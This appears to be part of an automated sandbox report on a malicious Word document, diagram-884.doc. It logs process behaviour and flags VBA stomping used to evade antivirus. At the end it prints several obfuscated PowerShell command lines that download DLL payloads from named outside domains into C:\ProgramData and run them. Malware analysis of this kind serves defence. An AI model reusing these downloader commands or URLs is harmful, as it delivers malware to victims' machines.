Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000007.00000002.446530536.000000000033A000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Show sources

Source: diagram-884.doc

OLE indicator, VBA stomping: true

Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
